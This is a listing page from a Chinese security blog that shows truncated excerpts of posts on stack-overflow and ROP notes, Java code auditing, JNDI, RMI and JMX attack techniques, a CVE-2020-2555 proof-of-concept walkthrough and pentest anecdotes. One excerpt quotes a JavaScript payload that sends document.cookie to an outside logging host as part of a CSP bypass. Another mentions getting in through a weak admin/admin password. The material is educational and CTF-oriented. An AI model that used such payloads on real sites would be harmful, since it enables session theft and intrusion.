网络知识复习 - Afant1 博客园_Afant1 3 years 10 months ago 工作中,用到了网络知识,本科时候大部分都学过,刷b站复习一下,以下就是复习笔记。 二层隔离技术-MUX-VLAN 实现PC1,PC2,PC3,PC4可以和Server1访问,PC1和PC2可以互相访问,PC3和PC4不能相互访问,其中VLAN 30 主VLAN,VLAN 10为互通型从VLAN,VL Afant1
java代码审计之路 - Afant1 博客园_Afant1 4 years 6 months ago 一、前言 首先,本文不是技术文章,主要给出大家java代码审计学习方向的资料、资源推荐,如何从小白一点一点成长。因为最近好多人私信我,怎么去学java代码审计,这里尽量把小白刚入门存在的问题给解答出来,没有考虑到的,可以评论区讨论。这也算是我的成长之路吧。 二、初级 首先,对于没有代码审计经验的,可 Afant1
iframe绕过csp - Afant1 博客园_Afant1 4 years 7 months ago 看csp规则,默认是在当前域内,允许执行内联js。如果这是一道ctf的话,就很简单了, window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe Afant1
实习时项目案例分享 - Afant1 博客园_Afant1 4 years 7 months ago 案例是在最近项目中遇到的俩个站,挺有意思的,所以分享出来。第一个站getshell后,内网简单的看了下,发现不是目标就没深入。 第一个站 1、弱口令 弱口令:admin admin进入网站后台 2、任意文件下载 在系统配置备份模块发现http://xxx.xxx.xxx.xxx/DownloadSe Afant1
栈溢出笔记-第六天 - Afant1 博客园_Afant1 4 years 8 months ago 当时不明白为什么要padding 8个a 原因: IDA查看当前的rsp是0x38 0x30=0x8,原因看上面 在vul函数ret地方下断点,rbp=0x1,r12=write_got地址,r13=0x1,r14=write_got地址,r15=0x8,执行add rsp,0x38= rsp就是0 Afant1
二进制安全的一些基础知识 - Afant1 博客园_Afant1 4 years 8 months ago 今天并没有刷题,看到ctf wiki高级ROP,发现ret2_dl_runtime_resolve,涉及到PLT&GOT 表以及延迟绑定机制,还是把基础打好。 今天笔记不多,主要是理解。推荐一下看的资料 "PLT&GOT 表以及延迟绑定机制" "ELF 文件结构解析" "ELF文件结构解析的工具" Afant1
栈溢出笔记-第五天 - Afant1 博客园_Afant1 4 years 8 months ago ROP x64位的,ret2csu: "http://www.vuln.cn/6644" "https://ctf wiki.github.io/ctf wiki/pwn/linux/stackoverflow/medium rop zh/ ret2reg" plt和got看这俩篇文章: "http Afant1
一次基于白盒的渗透测试 - Afant1 博客园_Afant1 4 years 8 months ago 一、事件起因 一次师兄让我检测一下他们开发的网站是否有漏洞,网站是php开发的,最近一直搞java,正好最近有场CTF要打,就顺便看看php. 二、获取源码 仔细看他给我发的那张图片,360给这个网站53的评分,仔细看网站存在.git文件泄露,直接用Githack拿到源码。 三、确定后台框架 拿到源 Afant1
栈溢出笔记-第四天 - Afant1 博客园_Afant1 4 years 8 months ago https://bbs.pediy.com/thread 248681.htm pwn4 这道题,查看是否有sytem系统函数,IDA中Alt+t 看system在plt表中的位置 查找一个pop xxx;ret为了堆栈平衡 也就是这个图的原理 在IDA中,plt表在的往下看找到.bss段发现buf Afant1
栈溢出笔记-第三天 - Afant1 博客园_Afant1 4 years 8 months ago 在看蒸米文章时候,http://www.vuln.cn/6645,这个例子是向buff写入shellcode,最后ret到shellcode地址执行。 堆栈示意图就是这样: 注意的点,算shellcode地址,去调试core文件,x/10s $esp 144,实际就是buf起始地址。 通过ROP绕过 Afant1
栈溢出笔记-第二天 - Afant1 博客园_Afant1 4 years 8 months ago 上一篇,计算缓冲区大小是通过IDA和gdb调试计算出来的,这次有个小trick. 我们可以用调试工具(例如 gdb)查看汇编代码来确定这个距离,也可以在运行程序时用不断增加输入长度的方法来试探(如果返回地址被无效地址例如“AAAA”覆盖,程序会终止并报错)。 来到vulnerable函数调用。cyc Afant1
栈溢出笔记-第一天 - Afant1 博客园_Afant1 4 years 8 months ago 1、 最简单函数调用栈图如下 (vc++6.0编译出的汇编代码): push 2,push 1将俩个参数压栈, call 0040100A :将eip要执行的下一条指令入栈,在执行jmp 0040100A push ebp :ebp入栈,保留调用前的栈底 mov ebp,esp 提升堆栈 sub E Afant1
JNDI实现回显研究 - Afant1 博客园_Afant1 4 years 9 months ago 文章首发在安全客: "https://www.anquanke.com/post/id/200892" 1、前言 最近出的回显文章内容毕竟多,linux下反序列化通杀回显,tomcat拿 类的response和request实现回显。之前就想过jndi注入能否实现回显,先看一遍jndi原理。 1. Afant1
Bypass JEP290攻击rmi - Afant1 博客园_Afant1 4 years 9 months ago 文章首发在安全客: "https://www.anquanke.com/post/id/200860" 1、前言 上一篇文章jmx攻击利用方式,通过修改参数为gadget实现攻击,本文与上一篇原理很类似。在2月份的时候 0c0c0f师傅写的是动态替换rmi通讯时候函数参数的值,也就是老外实现的方法。 Afant1
基于JMX协议攻击方式总结 - Afant1 博客园_Afant1 4 years 9 months ago 文章首发在安全客: "https://www.anquanke.com/post/id/200682" JMX(Java Management Extensions)。JMX可以跨越一系列异构操作系统平台、系统体系结构和网络传输协议,灵活的开发无缝集成的系统、网络和服务管理应用。MBean也是Jav Afant1
2019年总结 - Afant1 博客园_Afant1 4 years 9 months ago 以后每年写一篇总结吧,放假在家才想起来,今年还没总结。 19年博客上输出了38篇文章,先知上一篇: "https://xz.aliyun.com/t/5257" 。吐司上四篇: "1" , "2" , "3" , "4" 。90sec上一篇: "https://forum.90sec.com/t/t Afant1
教你一步一步构造CVE-2020-2555 POC - Afant1 博客园_Afant1 4 years 9 months ago 文章首发在安全客: "https://www.anquanke.com/post/id/200384" 1、前言 欸欸欸,不想写论文,起床发现 "https://www.zerodayinitiative.com/blog/2020/3/5/cve 2020 2555 rce through a d Afant1